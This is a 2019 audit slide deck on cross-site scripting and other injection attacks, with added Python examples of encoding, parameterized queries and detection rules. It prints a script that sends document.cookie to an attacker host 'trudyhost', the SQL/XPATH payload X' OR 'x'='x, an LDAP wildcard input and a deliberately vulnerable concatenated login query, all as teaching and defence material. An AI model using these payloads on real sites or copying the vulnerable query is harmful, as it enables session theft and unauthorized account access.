8/6/2019 Web Audit Vulnerability
Web Audit Vulnerability
cross-site scripting (XSS) concerns
by Ron Widitz
Audit Response
Either:
Prove issue to be a non-problem, or
Describe actions to take
Resolution Steps
Investigate security concerns
Restate as IT problem(s)
Determine solution(s)
Provide audit response
Mitigate risk
Investigation
Define cross-site scripting (XSS)
Examine how auditors applied
Identify risks
Research preliminary solutions
cross-site scripting
Attacker goal: get their code into the browser
XSS forces a website to execute malicious code in the browser
Browser user is the intended victim
Why? Account hijacking, keystroke recording, intranet hacking, theft
XSS concept
Auditor finding
Freeform edit box
Message to Customer Service
XSS types
Immediate reflection: phishing
DOM-based: 95 JavaScript methods
Redirection: header, meta, dynamic
Multimedia: Flash, QT, PDF scripts
Cross-Site Request Forgery (CSRF)
others (e.g. non-persistent search box)
Risks
XSS abuses render engines or plug-ins
Steal browser cookies
Steal session info for replay attack
Malware or bot installation
Redirect or phishing attempt
Our actual risk
Currently, none.
Edit box info viewed in thick client
DHTML or JavaScript needs browser
Our thick client is Java Swing-based
Planned Audit Response
Could indicate no audit problem
Might have future impact
Address through dev standards
Consider application firewall
Widen problem scope to include all user agent injection tactics
More on Web Attacks
Cross Site Scripting
SQL Injection
XPATH Injection
LDAP Injection
SSI (server side inclusion) Injection
JSP (Java server pages) Injection
Artifacts
For each injection issue:
Vulnerability description documented
Preventative coding technique
Discuss with App Dev teams
Publish and socialize direction
Include in peer reviews/code walkthroughs
Set deadlines for full incorporation
Communicate with auditors
Cross Site Scripting
Example 1
Trudy posts the following JavaScript on a message board:
document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy
Cross Site Scripting
Example 2
Trudy sends a link to the following URL to Bob that will take him to a personalized page:
http://host/personalizedpage.php?username=
Cross Site Scripting
Detection
A client usually is not supposed to send scripts to servers
If the server receives <SCRIPT> or the hex equivalent in an incoming packet, and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred
A sanitized script could look like
&lt;SCRIPT>
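An added example, not from the deck: server-side HTML encoding of the posted message, and the detection rule above (a script seen inbound, possibly percent-encoded, then echoed unsanitized outbound) as a Python check. The sample request and response are constructed; the helper names are assumptions of this example.

```python
import html
import re
from urllib.parse import quote, unquote

# Constructed sample: the script from Example 1 as Trudy would post it,
# plus the same post percent-encoded ("hex equivalent") as a browser sends it.
POSTED_SCRIPT = ("<script>document.location='http://trudyhost/cgi-bin/"
                 "stealcookie.cgi?'+document.cookie</script>")
INCOMING_REQUEST = "message=" + quote(POSTED_SCRIPT)

SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)


def normalize(data: str) -> str:
    """Percent-decode until stable so '%3Cscript' (and double-encoded
    '%253Cscript') compares equal to '<script'."""
    previous = None
    while previous != data:
        previous, data = data, unquote(data)
    return data


def sanitize(untrusted: str) -> str:
    """Server-side HTML encoding: the deck's sanitized form of a script
    (e.g. '<SCRIPT>' becomes '&lt;SCRIPT&gt;')."""
    return html.escape(untrusted, quote=True)


def xss_attack_occurred(incoming: str, outgoing: str) -> bool:
    """Deck rule: an incoming packet carries <script> (or its hex
    equivalent) and the same script leaves the server unsanitized."""
    inbound = normalize(incoming)
    match = SCRIPT_OPEN.search(inbound)
    if match is None:
        return False  # clients are not supposed to send scripts; none here
    start = match.start()
    end = inbound.lower().find("</script>", start)
    script = inbound[start:end + len("</script>")] if end != -1 else inbound[start:]
    # Echoed verbatim means it was not encoded on the way out.
    return script in outgoing
```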
SQL Injection Example
Trudy accesses Bob's website, on which he does not validate input on his sign-in form
Runs a SQL statement like the following:
SELECT * from Accounts where username = 'USER_NAME' and password = 'USER_PASS';
In the password field, she types as her password:
X' OR 'x'='x
Manipulates the server into running the following SQL command:
SELECT * from Accounts where username = 'USER_NAME' and password = 'X' OR 'x'='x';
Selects all account information
SQL Injection Detection
To detect and prevent this at Bob's location:
Log any traffic from Trudy to Bob containing form data containing a quotation mark
Match any outgoing SQL statements from Bob's web server to his database server and verify that the quotation marks Trudy supplied were escaped
If they weren't, take action
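An added Python example, not from the deck, covering both the SQL injection example and the detection slide: Bob's concatenated sign-in query beside a parameterized one, run against a constructed in-memory SQLite Accounts table, and a check that quotation marks from a logged form value reach the database only in escaped form. Table contents and function names are assumptions of this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample standing in for Bob's Accounts table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO Accounts VALUES (?, ?)",
                   [("bob", "s3cret"), ("alice", "hunter2")])
    return db


def build_sql(user_name: str, user_pass: str) -> str:
    """The sign-in statement as Bob's form assembles it: raw form values
    spliced between the quotation marks."""
    return ("SELECT * from Accounts where username = '" + user_name +
            "' and password = '" + user_pass + "';")


def login_vulnerable(db, user_name: str, user_pass: str) -> list:
    """Bob's unvalidated form: the password X' OR 'x'='x turns the WHERE
    clause into (... and password = 'X') OR 'x'='x', i.e. every row."""
    return db.execute(build_sql(user_name, user_pass)).fetchall()


def login_parameterized(db, user_name: str, user_pass: str) -> list:
    """Hardened form: the driver binds the values, so Trudy's quotation
    marks stay inside the data and the statement's logic is unchanged."""
    sql = "SELECT * from Accounts where username = ? and password = ?"
    return db.execute(sql, (user_name, user_pass)).fetchall()


def quotes_escaped(form_value: str, outbound_sql: str) -> bool:
    """Detection rule from the deck: a logged form value carrying a
    quotation mark must show up in the outbound SQL only in escaped
    (doubled '') form. Returns False when action should be taken."""
    if "'" not in form_value:
        return True  # nothing to verify for this value
    escaped = form_value.replace("'", "''")
    return form_value not in outbound_sql and escaped in outbound_sql
```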
XPATH Injection Example
Similar to SQL injection
Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:
string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())
Trudy again can provide the following password to change the statement's logic:
X' OR 'x'='x
The statement thus selects the first account
LDAP Injection Example
Server using LDAP for authentication
User name initialized, but then uses unchecked user input to create a query:
filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
Attacker can exploit using special characters:
http://example/ldapsearch.asp?user=*
LDAP Injection Detection
Detection is based on usage of special LDAP characters
System monitors input for special characters
Either scrubs incoming input or watches for unescaped output passed to database server
Detection approach is blackbox
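An added Python example, not from the deck, for the two LDAP slides: the filter from the example built with and without RFC 4515 value escaping, plus the ingress special-character monitor and the egress check for an unescaped value. Function names are assumptions of this example; the `*` input is the one from the deck's URL.

```python
# RFC 4515 escaping for a value placed inside an LDAP search filter.
LDAP_SPECIAL = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_value(value: str) -> str:
    """Encode each special character as backslash + two hex digits so it
    is matched literally instead of changing the filter's structure."""
    return "".join(LDAP_SPECIAL.get(ch, ch) for ch in value)


def build_filter_vulnerable(user_name: str) -> str:
    """The deck's ASP line: filter = "(uid=" + CStr(userName) + ")"."""
    return "(uid=" + user_name + ")"


def build_filter_safe(user_name: str) -> str:
    """Same filter with the user-controlled value escaped first."""
    return "(uid=" + escape_ldap_value(user_name) + ")"


def special_chars_in(user_input: str) -> list:
    """Ingress monitoring: which LDAP special characters did the input carry?"""
    return [ch for ch in user_input if ch in LDAP_SPECIAL]


def ldap_injection_suspected(user_input: str, outbound_filter: str) -> bool:
    """Blackbox egress check from the deck: flag when input carrying special
    characters reaches the directory server unescaped, i.e. the raw input
    is still present verbatim in the outbound filter."""
    return bool(special_chars_in(user_input)) and user_input in outbound_filter
```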
SSI Injection Example
Bob has his server configured to use Server-Side Includes
Trudy passes input with an SSI embedded
SSI inserts malicious code into normal webpages upon next request
Future legitimate users get content containing the tainted code included by the SSI
SSI Injection Detection
Bob's system needs SSI enabled, so he uses our system on local servers
SSI code can be detected by its specific format: an HTML comment containing a command
SSI commands can be stripped on ingress
Can also deny outgoing packets that do not include SSI as inputted (means successful execution)
Detection approach is blackbox
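An added Python example, not from the deck, of the two detection rules above: stripping SSI directives on ingress, and flagging a response in which the SSI directive from the input no longer appears as inputted. The submitted comment and rendered page are constructed; the directive syntax `<!--#command ... -->` is the standard Apache SSI form.

```python
import re

# An SSI directive is an HTML comment carrying a command, e.g.
# <!--#echo var="DATE_LOCAL" --> or <!--#include virtual="..." -->.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*\w+[^>]*-->")

# Constructed sample: a comment Trudy submits through Bob's form, and the
# page Bob's server would return if it executed the directive.
SUBMITTED = 'Great site! <!--#echo var="DATE_LOCAL" --> Cheers, Trudy'
PAGE_AFTER_EXECUTION = "Great site! Tuesday, 06-Aug-2019 Cheers, Trudy"


def strip_ssi(user_input: str) -> str:
    """Ingress scrubbing: remove SSI directives before the input is stored."""
    return SSI_DIRECTIVE.sub("", user_input)


def ssi_executed(user_input: str, outgoing_page: str) -> bool:
    """Egress rule from the deck: the input carried SSI directives but the
    outgoing page no longer shows them as inputted, so the server executed
    them and the response should be denied."""
    directives = SSI_DIRECTIVE.findall(user_input)
    return bool(directives) and any(d not in outgoing_page for d in directives)
```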
JSP Injection Example
Similar to SSI injection
Bob has a portal server configured to use dynamic code for templates
Trudy passes input with an embedded
malicious code inserted into webpage
JSP Injection Prevention
Prefer static include
Don't allow file inclusion outside of server via Java2 Security policies
Firewall rules to prevent outbound requests from server
Input validation coding
Choose portal software not requiring dynamic includes or code execution
Defense Approaches
Web firewall/IDS
  ModSecurity for Apache
  Commercial: SecureSphere from Imperva
Static code analysis
  Open source: Nikto
  Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
Education on good coding
  HTML encoding on input (server-side)
  Input validation/filtering
Q&A
Suggestions?
user agent injection
Stored
HTTP Response Splitting
SQL Injection
XML Injection
JSP Code Injection
LDAP Injection
Approaches
Application firewall
HTML encoding on input (server-side)
Input validation/filtering
Coding techniques with output
Session key enforced to prevent CSRF
XPATH Injection Detection
Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries
Correction can again be done by escaping any rogue quotation marks Trudy may have inserted
Detection approach is blackbox